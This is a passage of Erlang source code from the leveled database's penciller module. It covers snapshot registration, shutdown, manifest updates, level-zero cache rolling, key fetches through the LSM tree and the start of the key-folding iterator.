        case State#state.query_manifest of
            undefined ->
                leveled_pmanifest:query_manifest(
                    State#state.manifest, StartKey, EndKey);
            {QueryManifest, StartKeyQM, EndKeyQM}
                    when StartKey >= StartKeyQM, EndKey =< EndKeyQM ->
                QueryManifest
        end,
    SnapshotTime = State#state.snapshot_time,
    Folder =
        fun() ->
            keyfolder({FilteredL0, SSTiter},
                        {StartKey, EndKey},
                        {AccFun, InitAcc, SnapshotTime},
                        {SegmentList, LastModRange0, MaxKeys})
        end,
    % Either run the fold here (as_pcl) or hand the closure to the caller
    case By of
        as_pcl ->
            {reply, Folder(), State};
        by_runner ->
            {reply, Folder, State}
    end;
handle_call(get_startup_sqn, _From, State) ->
    % Highest SQN known to be persisted at startup
    {reply, State#state.persisted_sqn, State};
handle_call({register_snapshot, Snapshot, Query, BookiesMem, LongRunning},
                _From, State) ->
    % Register and load a snapshot
    %
    % For setup of the snapshot to be efficient should pass a query
    % of (StartKey, EndKey) - this will avoid a full copy of the penciller's
    % memory being required to be transferred to the clone.  However, this
    % will not be a valid clone for fetch
    TimeO =
        case LongRunning of
            true ->
                State#state.snaptimeout_long;
            false ->
                State#state.snaptimeout_short
        end,
    Manifest0 =
        leveled_pmanifest:add_snapshot(State#state.manifest, Snapshot, TimeO),
    {BookieIncrTree, BookieIdx, MinSQN, MaxSQN} = BookiesMem,
    LM1Cache =
        case BookieIncrTree of
            empty_cache ->
                leveled_tree:empty(?CACHE_TYPE);
            _ ->
                BookieIncrTree
        end,
    % Three snapshot flavours:
    %   no_lookup  - cache copied, no L0 index (folds only, no fetch)
    %   {SK, EK}   - pre-merged tree plus query manifest for that range only
    %   undefined  - full clone including the L0 index (fetch-capable)
    {CloneState, ManifestClone, QueryManifest} =
        case Query of
            no_lookup ->
                {UpdMaxSQN, UpdSize, L0Cache} =
                    leveled_pmem:add_to_cache(
                        State#state.levelzero_size,
                        {LM1Cache, MinSQN, MaxSQN},
                        State#state.ledger_sqn,
                        State#state.levelzero_cache,
                        false),
                {#state{levelzero_cache = L0Cache,
                        ledger_sqn = UpdMaxSQN,
                        levelzero_size = UpdSize,
                        persisted_sqn = State#state.persisted_sqn},
                    leveled_pmanifest:copy_manifest(State#state.manifest),
                    undefined};
            {StartKey, EndKey} ->
                SW = os:timestamp(),
                L0AsTree =
                    leveled_pmem:merge_trees(StartKey,
                                                EndKey,
                                                State#state.levelzero_cache,
                                                LM1Cache),
                leveled_log:log_randomtimer(
                    p0037, [State#state.levelzero_size], SW, 0.01),
                {#state{levelzero_astree = L0AsTree,
                        ledger_sqn = MaxSQN,
                        persisted_sqn = State#state.persisted_sqn},
                    undefined,
                    {leveled_pmanifest:query_manifest(
                        State#state.manifest, StartKey, EndKey),
                        StartKey,
                        EndKey}};
            undefined ->
                {UpdMaxSQN, UpdSize, L0Cache} =
                    leveled_pmem:add_to_cache(
                        State#state.levelzero_size,
                        {LM1Cache, MinSQN, MaxSQN},
                        State#state.ledger_sqn,
                        State#state.levelzero_cache,
                        false),
                LM1Idx =
                    case BookieIdx of
                        empty_index ->
                            leveled_pmem:new_index();
                        _ ->
                            BookieIdx
                    end,
                L0Index =
                    leveled_pmem:add_to_index(
                        LM1Idx, State#state.levelzero_index, length(L0Cache)),
                {#state{levelzero_cache = L0Cache,
                        levelzero_index = L0Index,
                        levelzero_size = UpdSize,
                        ledger_sqn = UpdMaxSQN,
                        persisted_sqn = State#state.persisted_sqn},
                    leveled_pmanifest:copy_manifest(State#state.manifest),
                    undefined}
        end,
    {reply,
        {ok,
            CloneState#state{snapshot_fully_loaded = true,
                                snapshot_time = leveled_util:integer_now(),
                                manifest = ManifestClone,
                                query_manifest = QueryManifest}},
        State#state{manifest = Manifest0}};
handle_call(close, _From, State=#state{is_snapshot=Snap}) when Snap == true ->
    % A snapshot only needs to de-register from the source penciller
    ok = pcl_releasesnapshot(State#state.source_penciller, self()),
    {stop, normal, ok, State};
handle_call(close, _From, State) ->
    % Level 0 files lie outside of the manifest, and so if there is no L0
    % file present it is safe to write the current contents of memory.  If
    % there is a L0 file present - then the memory can be dropped (it is
    % recoverable from the ledger, and there should not be a lot to recover
    % as presumably the ETS file has been recently flushed, hence the presence
    % of a L0 file).
    %
    % The penciller should close each file in the manifest, and call a close
    % on the clerk.
    ok = leveled_pclerk:clerk_close(State#state.clerk),
    leveled_log:log(p0008, [close]),
    L0Left = State#state.levelzero_size > 0,
    case (not State#state.levelzero_pending and L0Left) of
        true ->
            Man0 = State#state.manifest,
            % Roll the in-memory level-zero cache out to a final SST file
            {Constructor, _} =
                roll_memory(
                    leveled_pmanifest:get_manifest_sqn(Man0) + 1,
                    State#state.ledger_sqn,
                    State#state.root_path,
                    State#state.levelzero_cache,
                    length(State#state.levelzero_cache),
                    State#state.sst_options,
                    true),
            ok = leveled_sst:sst_close(Constructor);
        false ->
            leveled_log:log(p0010, [State#state.levelzero_size])
    end,
    shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
    {stop, normal, ok, State};
handle_call(doom, _From, State) ->
    % As close, but reply with the ledger folder paths so the caller can
    % erase the store from disk; memory is not rolled to a L0 file
    leveled_log:log(p0030, []),
    ok = leveled_pclerk:clerk_close(State#state.clerk),
    shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
    ManifestFP = State#state.root_path ++ "/" ++ ?MANIFEST_FP ++ "/",
    FilesFP = State#state.root_path ++ "/" ++ ?FILES_FP ++ "/",
    {stop, normal, {ok, [ManifestFP, FilesFP]}, State};
handle_call({checkbloom_fortest, Key, Hash}, _From, State) ->
Manifest = State#state.manifest,
FoldFun =
fun(Level, Acc) ->
case Acc of
true ->
true;
false ->
case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
false ->
false;
FP ->
leveled_pmanifest:check_bloom(Manifest, FP, Hash)
end
end
end,
{reply, lists:foldl(FoldFun, false, lists:seq(0, ?MAX_LEVELS)), State};
handle_call(check_for_work, _From, State) ->
{_WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
{reply, WC > 0, State};
handle_call(persisted_sqn, _From, State) ->
{reply, State#state.persisted_sqn, State}.
%% Asynchronous penciller requests: manifest changes and work prompts from
%% the clerk, snapshot releases, file delete confirmations, level-zero file
%% completion, level-zero slot fetches, and logging controls.
handle_cast({manifest_change, Manifest}, State) ->
    NewManSQN = leveled_pmanifest:get_manifest_sqn(Manifest),
    OldManSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest),
    leveled_log:log(p0041, [OldManSQN, NewManSQN]),
    % Only safe to update the manifest if the SQN increments
    if NewManSQN > OldManSQN ->
        ok =
            leveled_pclerk:clerk_promptdeletions(State#state.clerk, NewManSQN),
        % This is accepted as the new manifest, files may be deleted
        UpdManifest0 =
            leveled_pmanifest:merge_snapshot(State#state.manifest, Manifest),
        % Need to preserve the penciller's view of snapshots stored in
        % the manifest
        UpdManifest1 =
            leveled_pmanifest:clear_pending(
                UpdManifest0,
                lists:usort(State#state.pending_removals),
                State#state.maybe_release),
        {noreply,
            State#state{
                manifest=UpdManifest1,
                pending_removals = [],
                maybe_release = false,
                work_ongoing=false}}
    end;
handle_cast({release_snapshot, Snapshot}, State) ->
    Manifest0 = leveled_pmanifest:release_snapshot(State#state.manifest,
                                                    Snapshot),
    leveled_log:log(p0003, [Snapshot]),
    {noreply, State#state{manifest=Manifest0}};
handle_cast({confirm_delete, PDFN, FilePid}, State=#state{is_snapshot=Snap})
                                                        when Snap == false ->
    % This is a two stage process.  A file that is ready for deletion can be
    % checked against the manifest to prompt the deletion, however it must also
    % be removed from the manifest's list of pending deletes.  This is only
    % possible when the manifest is in control of the penciller not the clerk.
    % When work is ongoing (i.e. the manifest is under control of the clerk),
    % any removals from the manifest need to be stored temporarily (in
    % pending_removals) until such time that the manifest is in control of the
    % penciller and can be updated.
    % The maybe_release boolean on state is used if any file is not ready to
    % delete, and there is work ongoing.  This will then trigger a check to
    % ensure any timed out snapshots are released, in case this is the factor
    % blocking the delete confirmation
    % When an updated manifest is submitted by the clerk, the pending_removals
    % will be cleared from pending using the maybe_release boolean
    case leveled_pmanifest:ready_to_delete(State#state.manifest, PDFN) of
        true ->
            leveled_log:log(p0005, [PDFN]),
            ok = leveled_sst:sst_deleteconfirmed(FilePid),
            case State#state.work_ongoing of
                true ->
                    {noreply,
                        State#state{
                            pending_removals =
                                [PDFN|State#state.pending_removals]}};
                false ->
                    UpdManifest =
                        leveled_pmanifest:clear_pending(
                            State#state.manifest,
                            [PDFN],
                            false),
                    {noreply,
                        State#state{manifest = UpdManifest}}
            end;
        false ->
            case State#state.work_ongoing of
                true ->
                    {noreply, State#state{maybe_release = true}};
                false ->
                    UpdManifest =
                        leveled_pmanifest:clear_pending(
                            State#state.manifest,
                            [],
                            true),
                    {noreply,
                        State#state{manifest = UpdManifest}}
            end
    end;
handle_cast({levelzero_complete, FN, StartKey, EndKey, Bloom}, State) ->
    leveled_log:log(p0029, []),
    ManEntry = #manifest_entry{start_key=StartKey,
                                end_key=EndKey,
                                owner=State#state.levelzero_constructor,
                                filename=FN,
                                bloom=Bloom},
    ManifestSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest) + 1,
    UpdMan = leveled_pmanifest:insert_manifest_entry(State#state.manifest,
                                                        ManifestSQN,
                                                        0,
                                                        ManEntry),
    % Prompt clerk to ask about work - do this for every L0 roll
    ok = leveled_pclerk:clerk_prompt(State#state.clerk),
    % L0 is now persisted - reset the in-memory cache and mark the ledger
    % SQN as the persisted SQN
    {noreply, State#state{levelzero_cache=[],
                            levelzero_index=[],
                            levelzero_pending=false,
                            levelzero_constructor=undefined,
                            levelzero_size=0,
                            manifest=UpdMan,
                            persisted_sqn=State#state.ledger_sqn}};
handle_cast(work_for_clerk, State) ->
    case {(State#state.levelzero_pending or State#state.work_ongoing),
            leveled_pmanifest:levelzero_present(State#state.manifest)} of
        {true, _L0Present} ->
            % Work is blocked by ongoing activity
            {noreply, State};
        {false, true} ->
            % If L0 present, and no work ongoing - dropping L0 to L1 is the
            % priority
            ok = leveled_pclerk:clerk_push(
                    State#state.clerk, {0, State#state.manifest}),
            {noreply, State#state{work_ongoing=true}};
        {false, false} ->
            % No impediment to work - see what other work may be required
            % See if the in-memory cache requires rolling now
            CacheOverSize =
                maybe_cache_too_big(
                    State#state.levelzero_size,
                    State#state.levelzero_maxcachesize,
                    State#state.levelzero_cointoss),
            CacheAlreadyFull =
                leveled_pmem:cache_full(State#state.levelzero_cache),
            % Check for a backlog of work
            {WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
            case {WC, (CacheAlreadyFull or CacheOverSize)} of
                {0, false} ->
                    % No work required
                    {noreply, State#state{work_backlog = false}};
                {WC, true} when WC < ?WORKQUEUE_BACKLOG_TOLERANCE ->
                    % Rolling the memory to create a new Level Zero file
                    % Must not do this if there is a work backlog beyond the
                    % tolerance, as then the backlog may never be addressed.
                    NextSQN =
                        leveled_pmanifest:get_manifest_sqn(
                            State#state.manifest) + 1,
                    {Constructor, none} =
                        roll_memory(
                            NextSQN,
                            State#state.ledger_sqn,
                            State#state.root_path,
                            none,
                            length(State#state.levelzero_cache),
                            State#state.sst_options,
                            false),
                    {noreply,
                        State#state{
                            levelzero_pending = true,
                            levelzero_constructor = Constructor,
                            work_backlog = false}};
                {WC, L0Full} ->
                    % Address the backlog of work, either because there is no
                    % L0 work to do, or because the backlog has grown beyond
                    % tolerance
                    Backlog = WC >= ?WORKQUEUE_BACKLOG_TOLERANCE,
                    leveled_log:log(p0024, [WC, Backlog, L0Full]),
                    [TL|_Tail] = WL,
                    ok =
                        leveled_pclerk:clerk_push(
                            State#state.clerk, {TL, State#state.manifest}),
                    {noreply,
                        State#state{
                            work_backlog = Backlog, work_ongoing = true}}
            end
    end;
handle_cast({fetch_levelzero, Slot, ReturnFun}, State) ->
    % Hand one slot of the L0 cache back to an SST constructor (async roll)
    ReturnFun(lists:nth(Slot, State#state.levelzero_cache)),
    {noreply, State};
handle_cast({log_level, LogLevel}, State) ->
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_loglevel(PC, LogLevel),
    ok = leveled_log:set_loglevel(LogLevel),
    % Propagate the updated log options to new SST files via sst_options
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}};
handle_cast({add_logs, ForcedLogs}, State) ->
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_addlogs(PC, ForcedLogs),
    ok = leveled_log:add_forcedlogs(ForcedLogs),
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}};
handle_cast({remove_logs, ForcedLogs}, State) ->
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_removelogs(PC, ForcedLogs),
    ok = leveled_log:remove_forcedlogs(ForcedLogs),
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}}.
%% handle the bookie stopping and stop this snapshot
handle_info({'DOWN', BookieMonRef, process, _BookiePid, _Info},
            State=#state{bookie_monref = BookieMonRef}) ->
    % The monitored bookie has gone down - release this snapshot from the
    % source penciller and stop normally
    ok = pcl_releasesnapshot(State#state.source_penciller, self()),
    {stop, normal, State};
handle_info(_Info, State) ->
    % Ignore any other messages
    {noreply, State}.
%% Log the termination reason - p0007 for a snapshot penciller, p0011 for
%% the primary penciller.  Resource cleanup happens via the close path.
terminate(Reason, _State=#state{is_snapshot=Snap}) when Snap == true ->
    leveled_log:log(p0007, [Reason]);
terminate(Reason, _State) ->
    leveled_log:log(p0011, [Reason]).
%% Redact the large in-memory structures when state is formatted at
%% termination, so crash reports are not flooded with cache contents.
format_status(normal, [_PDict, State]) ->
    State;
format_status(terminate, [_PDict, State]) ->
    State#state{manifest = redacted,
                levelzero_cache = redacted,
                levelzero_index = redacted,
                levelzero_astree = redacted}.
%% No state transformation required on hot code upgrade
code_change(_OldVsn, State, _Extra) ->
    {ok, State}.
%%%============================================================================
%%% Path functions
%%%============================================================================
%% Return the SST file directory under RootPath, ensuring it exists on disk
sst_rootpath(RootPath) ->
    FP = RootPath ++ "/" ++ ?FILES_FP,
    filelib:ensure_dir(FP ++ "/"),
    FP.
%% Build the conventional SST file name (relative to the SST root path)
%% from the manifest SQN, the level and the file count.
sst_filename(ManSQN, Level, Count) ->
    NameFormat = "./~w_~w_~w" ++ ?SST_FILEX,
    lists:flatten(io_lib:format(NameFormat, [ManSQN, Level, Count])).
%%%============================================================================
%%% Internal functions
%%%============================================================================
-spec start_from_file(penciller_options()) -> {ok, pcl_state()}.
%% @doc
%% Normal start of a penciller (i.e. not a snapshot), needs to read the
%% filesystem and reconstruct the ledger from the files that it finds
start_from_file(PCLopts) ->
    RootPath = PCLopts#penciller_options.root_path,
    MaxTableSize = PCLopts#penciller_options.max_inmemory_tablesize,
    OptsSST = PCLopts#penciller_options.sst_options,
    Monitor = PCLopts#penciller_options.monitor,
    SnapTimeoutShort = PCLopts#penciller_options.snaptimeout_short,
    SnapTimeoutLong = PCLopts#penciller_options.snaptimeout_long,
    {ok, MergeClerk} = leveled_pclerk:clerk_new(self(), RootPath, OptsSST),
    CoinToss = PCLopts#penciller_options.levelzero_cointoss,
    % Used to randomly defer the writing of L0 file.  Intended to help with
    % vnode synchronisation issues (e.g. stop them all by default merging to
    % level zero concurrently)
    InitState = #state{clerk = MergeClerk,
                        root_path = RootPath,
                        levelzero_maxcachesize = MaxTableSize,
                        levelzero_cointoss = CoinToss,
                        levelzero_index = [],
                        snaptimeout_short = SnapTimeoutShort,
                        snaptimeout_long = SnapTimeoutLong,
                        sst_options = OptsSST,
                        monitor = Monitor},
    %% Open manifest
    Manifest0 = leveled_pmanifest:open_manifest(RootPath),
    OpenFun =
        fun(FN, Level) ->
            {ok, Pid, {_FK, _LK}, Bloom} =
                leveled_sst:sst_open(sst_rootpath(RootPath),
                                        FN, OptsSST, Level),
            {Pid, Bloom}
        end,
    SQNFun = fun leveled_sst:sst_getmaxsequencenumber/1,
    {MaxSQN, Manifest1, FileList} =
        leveled_pmanifest:load_manifest(Manifest0, OpenFun, SQNFun),
    leveled_log:log(p0014, [MaxSQN]),
    ManSQN = leveled_pmanifest:get_manifest_sqn(Manifest1),
    leveled_log:log(p0035, [ManSQN]),
    %% Find any L0 files
    L0FN = sst_filename(ManSQN + 1, 0, 0),
    {State0, FileList0} =
        case filelib:is_file(filename:join(sst_rootpath(RootPath), L0FN)) of
            true ->
                % An L0 file survived a previous shutdown - open it and
                % insert it into the manifest at Level 0
                leveled_log:log(p0015, [L0FN]),
                L0Open = leveled_sst:sst_open(sst_rootpath(RootPath),
                                                L0FN,
                                                OptsSST,
                                                0),
                {ok, L0Pid, {L0StartKey, L0EndKey}, Bloom} = L0Open,
                L0SQN = leveled_sst:sst_getmaxsequencenumber(L0Pid),
                L0Entry = #manifest_entry{start_key = L0StartKey,
                                            end_key = L0EndKey,
                                            filename = L0FN,
                                            owner = L0Pid,
                                            bloom = Bloom},
                Manifest2 =
                    leveled_pmanifest:insert_manifest_entry(Manifest1,
                                                            ManSQN + 1,
                                                            0,
                                                            L0Entry),
                leveled_log:log(p0016, [L0SQN]),
                LedgerSQN = max(MaxSQN, L0SQN),
                {InitState#state{manifest = Manifest2,
                                    ledger_sqn = LedgerSQN,
                                    persisted_sqn = LedgerSQN},
                    [L0FN|FileList]};
            false ->
                leveled_log:log(p0017, []),
                {InitState#state{manifest = Manifest1,
                                    ledger_sqn = MaxSQN,
                                    persisted_sqn = MaxSQN},
                    FileList}
        end,
    % Move aside any stray SST files not referenced by the loaded manifest
    ok = archive_files(RootPath, FileList0),
    {ok, State0}.
-spec shutdown_manifest(leveled_pmanifest:manifest(), pid()|undefined) -> ok.
%% @doc
%% Shutdown all the SST files within the manifest
shutdown_manifest(Manifest, L0Constructor) ->
    EntryCloseFun =
        fun(ME) ->
            % An entry may be a manifest_entry record, a {StartKey, Entry}
            % tuple wrapping one, or a bare pid/undefined (as when the L0
            % constructor is passed directly below)
            Owner =
                case is_record(ME, manifest_entry) of
                    true ->
                        ME#manifest_entry.owner;
                    false ->
                        case ME of
                            {_SK, ME0} ->
                                ME0#manifest_entry.owner;
                            ME ->
                                ME
                        end
                end,
            ok =
                case check_alive(Owner) of
                    true ->
                        leveled_sst:sst_close(Owner);
                    false ->
                        % Already dead (or undefined) - nothing to close
                        ok
                end
        end,
    leveled_pmanifest:close_manifest(Manifest, EntryCloseFun),
    EntryCloseFun(L0Constructor).
-spec check_alive(pid()|undefined) -> boolean().
%% @doc
%% Double-check a process is active before attempting to terminate it;
%% anything other than a live pid (e.g. undefined) is reported as dead.
check_alive(Candidate) ->
    is_pid(Candidate) andalso is_process_alive(Candidate).
-spec archive_files(list(), list()) -> ok.
%% @doc
%% Archive any sst files in the folder that have not been used to build the
%% ledger at startup.  They may have not deleted as expected, so this saves
%% them off as non-SST files to make it easier for an admin to garbage
%% collect these files
archive_files(RootPath, UsedFileList) ->
    {ok, AllFiles} = file:list_dir(sst_rootpath(RootPath)),
    FileCheckFun =
        fun(FN, UnusedFiles) ->
            % File names in the used list carry a "./" prefix - normalise
            % the directory listing before comparing
            FN0 = "./" ++ FN,
            case filename:extension(FN0) of
                ?SST_FILEX ->
                    case lists:member(FN0, UsedFileList) of
                        true ->
                            UnusedFiles;
                        false ->
                            leveled_log:log(p0040, [FN0]),
                            [FN0|UnusedFiles]
                    end;
                _ ->
                    % Not an SST file - leave it alone
                    UnusedFiles
            end
        end,
    RenameFun =
        fun(FN) ->
            % Swap the SST extension for the archive extension
            AltName = filename:join(sst_rootpath(RootPath),
                                    filename:basename(FN, ?SST_FILEX))
                        ++ ?ARCHIVE_FILEX,
            file:rename(filename:join(sst_rootpath(RootPath), FN),
                        AltName)
        end,
    FilesToArchive = lists:foldl(FileCheckFun, [], AllFiles),
    lists:foreach(RenameFun, FilesToArchive),
    ok.
-spec maybe_cache_too_big(
    pos_integer(), pos_integer(), boolean()) -> boolean().
%% @doc
%% Is the cache too big - should it be flushed to an on-disk Level 0 file?
%% There exists some jitter to prevent all caches from flushing concurrently
%% where there are multiple leveled instances on one machine.
maybe_cache_too_big(NewL0Size, L0MaxSize, CoinToss) ->
    OverLimit = NewL0Size > L0MaxSize,
    WayOverLimit = NewL0Size > min(?SUPER_MAX_TABLE_SIZE, 2 * L0MaxSize),
    % With the coin toss enabled the flush is randomly deferred, unless
    % the cache has grown way over the limit
    FlushAnyway =
        case CoinToss of
            true ->
                leveled_rand:uniform(?COIN_SIDECOUNT) == 1;
            false ->
                true
        end,
    OverLimit and (FlushAnyway or WayOverLimit).
-spec roll_memory(
    pos_integer(), non_neg_integer(), string(),
    levelzero_cache()|none, pos_integer(),
    sst_options(), boolean())
        -> {pid(), leveled_ebloom:bloom()|none}.
%% @doc
%% Roll the in-memory cache into a L0 file.  If this is done synchronously,
%% will return a bloom representing the contents of the file.
%%
%% Casting a large object (the levelzero cache) to the SST file does not lead
%% to an immediate return.  With 32K keys in the TreeList it could take around
%% 35 - 40ms due to the overheads of copying.
%%
%% To avoid blocking the penciller, the SST file can request each item of the
%% cache one at a time.
%%
%% The Wait is set to false to use a cast when calling this in normal operation
%% where as the Wait of true is used at shutdown
roll_memory(NextManSQN, LedgerSQN, RootPath, none, CL, SSTOpts, false) ->
    % Asynchronous roll - the constructor calls back into the penciller
    % (pcl_fetchlevelzero) to pull cache slots one at a time
    L0Path = sst_rootpath(RootPath),
    L0FN = sst_filename(NextManSQN, 0, 0),
    leveled_log:log(p0019, [L0FN, LedgerSQN]),
    PCL = self(),
    FetchFun =
        fun(Slot, ReturnFun) -> pcl_fetchlevelzero(PCL, Slot, ReturnFun) end,
    {ok, Constructor, _} =
        leveled_sst:sst_newlevelzero(
            L0Path, L0FN, CL, FetchFun, PCL, LedgerSQN, SSTOpts),
    {Constructor, none};
roll_memory(NextManSQN, LedgerSQN, RootPath, L0Cache, CL, SSTOpts, true) ->
    % Synchronous roll (shutdown) - flatten the whole cache and write it
    % immediately, returning the file's bloom
    L0Path = sst_rootpath(RootPath),
    L0FN = sst_filename(NextManSQN, 0, 0),
    FetchFun = fun(Slot) -> lists:nth(Slot, L0Cache) end,
    KVList = leveled_pmem:to_list(CL, FetchFun),
    {ok, Constructor, _, Bloom} =
        leveled_sst:sst_new(
            L0Path, L0FN, 0, KVList, LedgerSQN, SSTOpts),
    {Constructor, Bloom}.
-spec timed_fetch_mem(
    tuple(),
    {integer(), integer()},
    leveled_pmanifest:manifest(), list(),
    leveled_pmem:index_array(),
    leveled_monitor:monitor()) -> leveled_codec:ledger_kv()|not_found.
%% @doc
%% Fetch the result from the penciller, starting by looking in the memory,
%% and if it is not found looking down level by level through the LSM tree.
%%
%% This allows for the request to be timed, and the timing result to be added
%% to the aggregate timings - so that timings per level can be logged and
%% the cost of requests dropping levels can be monitored.
%%
%% the result tuple includes the level at which the result was found.
timed_fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, Monitor) ->
    SW0 = leveled_monitor:maybe_time(Monitor),
    {R, Level} =
        fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun timed_sst_get/4),
    {TS0, _SW1} = leveled_monitor:step_time(SW0),
    maybelog_fetch_timing(Monitor, Level, TS0, R == not_present),
    R.
-spec fetch_sqn(
    leveled_codec:ledger_key(),
    leveled_codec:segment_hash(),
    leveled_pmanifest:manifest(),
    list(),
    leveled_pmem:index_array()) ->
        not_present|leveled_codec:ledger_kv()|leveled_codec:ledger_sqn().
%% @doc
%% Fetch the result from the penciller, starting by looking in the memory,
%% and if it is not found looking down level by level through the LSM tree.
%% Only the result is required here - the level found at is discarded.
fetch_sqn(Key, Hash, Manifest, L0Cache, L0Index) ->
    R = fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun sst_getsqn/4),
    element(1, R).
%% Look the key up in the in-memory level-zero cache first; on a miss fall
%% through to the persisted levels via fetch/5.  Returns {Result, Level}
%% where Level is the atom `memory` for a cache hit.
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, FetchFun) ->
    SlotsToCheck =
        case L0Index of
            none ->
                % No index available - every cache slot must be checked
                lists:seq(1, length(L0Cache));
            _ ->
                leveled_pmem:check_index(Hash, L0Index)
        end,
    case leveled_pmem:check_levelzero(Key, Hash, SlotsToCheck, L0Cache) of
        {true, KV} ->
            {KV, memory};
        {false, not_found} ->
            fetch(Key, Hash, Manifest, 0, FetchFun)
    end.
-spec fetch(tuple(), {integer(), integer()},
            leveled_pmanifest:manifest(), integer(),
            sst_fetchfun()) -> {tuple()|not_present, integer()|basement}.
%% @doc
%% Fetch from the persisted portion of the LSM tree, checking each level in
%% turn until a match is found.
%% Levels can be skipped by checking the bloom for the relevant file at that
%% level.
fetch(_Key, _Hash, _Manifest, ?MAX_LEVELS + 1, _FetchFun) ->
    % Ran off the bottom of the tree - the key is not present
    {not_present, basement};
fetch(Key, Hash, Manifest, Level, FetchFun) ->
    case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
        false ->
            % No file at this level covers the key - drop a level
            fetch(Key, Hash, Manifest, Level + 1, FetchFun);
        FP ->
            case leveled_pmanifest:check_bloom(Manifest, FP, Hash) of
                true ->
                    case FetchFun(FP, Key, Hash, Level) of
                        not_present ->
                            fetch(Key, Hash, Manifest, Level + 1, FetchFun);
                        ObjectFound ->
                            {ObjectFound, Level}
                    end;
                false ->
                    % Bloom indicates absence - skip reading this file
                    fetch(Key, Hash, Manifest, Level + 1, FetchFun)
            end
    end.
%% Fetch from a single SST file, measuring the elapsed microseconds and
%% logging via log_slowfetch if the fetch exceeded the tolerance.
timed_sst_get(PID, Key, Hash, Level) ->
    StartTS = os:timestamp(),
    Result = leveled_sst:sst_get(PID, Key, Hash),
    Elapsed = timer:now_diff(os:timestamp(), StartTS),
    log_slowfetch(Elapsed, Result, PID, Level, ?SLOW_FETCH).
%% Fetch only the sequence number for a key from an SST file (level unused)
sst_getsqn(PID, Key, Hash, _Level) ->
    leveled_sst:sst_getsqn(PID, Key, Hash).
%% Pass the fetch result through unchanged, logging pc016 whenever the
%% fetch took at least FetchTolerance microseconds.
log_slowfetch(T0, R, _PID, _Level, FetchTolerance) when T0 < FetchTolerance ->
    R;
log_slowfetch(T0, not_present, PID, Level, _FetchTolerance) ->
    leveled_log:log(pc016, [PID, T0, Level, not_present]),
    not_present;
log_slowfetch(T0, R, PID, Level, _FetchTolerance) ->
    leveled_log:log(pc016, [PID, T0, Level, found]),
    R.
-spec compare_to_sqn(
    leveled_codec:ledger_kv()|leveled_codec:sqn()|not_present,
    integer()) -> sqn_check().
%% @doc
%% Check to see if the SQN in the penciller is after the SQN expected for an
%% object (used to allow the journal to check compaction status from a cache
%% of the ledger - objects with a more recent sequence number can be compacted).
compare_to_sqn(not_present, _SQN) ->
    missing;
compare_to_sqn(ObjSQN, SQN) when is_integer(ObjSQN), ObjSQN > SQN ->
    replaced;
compare_to_sqn(ObjSQN, _SQN) when is_integer(ObjSQN) ->
    % Normally we would expect the SQN to be equal here, but
    % this also allows for the Journal to have a more advanced
    % value.  We return true here as we wouldn't want to
    % compact that more advanced value, but this may cause
    % confusion in snapshots.
    current;
compare_to_sqn(Obj, SQN) ->
    % A full ledger KV - strip to its sequence number and re-check
    compare_to_sqn(leveled_codec:strip_to_seqonly(Obj), SQN).
%%%============================================================================
%%% Iterator functions
%%%
%%% TODO - move to dedicated module with extended unit testing
%%%============================================================================
-spec keyfolder(list(), list(), tuple(), tuple(),
                {pclacc_fun(), any(), pos_integer()}) -> any().
%% @doc
%% The keyfolder will compare an iterator across the immutable in-memory cache
%% of the Penciller (the IMMiter), with an iterator across the persisted part
%% (the SSTiter).
%%
%% A Segment List and a MaxKeys may be passed.  Every time something is added
%% to the accumulator MaxKeys is reduced - so set MaxKeys to -1 if it is
%% intended to be infinite.
%%
%% The basic principle is to take the next key in the IMMiter and compare it
%% to the next key in the SSTiter, and decide which one should be added to the
%% accumulator.  The iterators are advanced if they either win (i.e. are the
%% next key), or are dominated.  This goes on until the iterators are empty.
%%
%% To advance the SSTiter the find_nextkey/4 function is used, as the SSTiter
%% is an iterator across multiple levels - and so needs to do its own
%% comparisons to pop the next result.
keyfolder(IMMiter, SSTiter, StartKey, EndKey, {AccFun, Acc, Now}) ->
    keyfolder({IMMiter, SSTiter},
                {StartKey, EndKey},
                {AccFun, Acc, Now},
                {false, {0, infinity}, -1}).

keyfolder(_Iterators,
            _KeyRange,
            {_AccFun, Acc, _Now},
            {_SegmentList, _LastModRange, MaxKeys}) when MaxKeys == 0 ->
    % Max key count hit - return the remainder (0) alongside the
    % accumulator
    {0, Acc};
keyfolder({[], SSTiter}, KeyRange, {AccFun, Acc, Now},
            {SegmentList, LastModRange, MaxKeys}) ->
    % In-memory iterator exhausted - only the persisted iterator remains
    {StartKey, EndKey} = KeyRange,
    case find_nextkey(SSTiter, StartKey, EndKey,
                        SegmentList, element(1, LastModRange)) of
        no_more_keys ->
            case MaxKeys > 0 of
                true ->
                    % This query had a max count, so we must respond with the
                    % remainder on the count
                    {MaxKeys, Acc};
                false ->
                    % This query started with a MaxKeys set to -1.  Query is
                    % not interested in having MaxKeys in Response
                    Acc
            end;
        {NxSSTiter, {SSTKey, SSTVal}} ->
            {Acc1, MK1} =
                maybe_accumulate(SSTKey, SSTVal,
                                    {Acc, AccFun, Now},
                                    MaxKeys, LastModRange),
            keyfolder({[], NxSSTiter},
                        KeyRange,
                        {AccFun, Acc1, Now},
                        {SegmentList, LastModRange, MK1})
    end;
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator], SSTiterator},
            KeyRange,
            {AccFun, Acc, Now},
